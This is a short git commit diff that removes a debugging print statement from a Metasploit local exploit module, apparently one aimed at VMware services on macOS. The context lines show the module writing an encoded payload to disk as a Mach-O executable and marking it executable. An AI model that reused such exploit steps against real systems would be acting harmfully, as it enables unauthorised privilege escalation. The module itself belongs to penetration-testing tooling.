remove debugging
parent
8cb4ed4cb7
commit
f13289ab65
|
@ -72,7 +72,6 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
exe = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
|
||||
write_file(payload_file, exe)
|
||||
register_file_for_cleanup(payload_file)
|
||||
print_status("Got here")
|
||||
cmd_exec("chmod +x #{payload_file}")
|
||||
|
||||
print_status("Running VMWare services...")
|
||||
|
|
Loading…
Reference in New Issue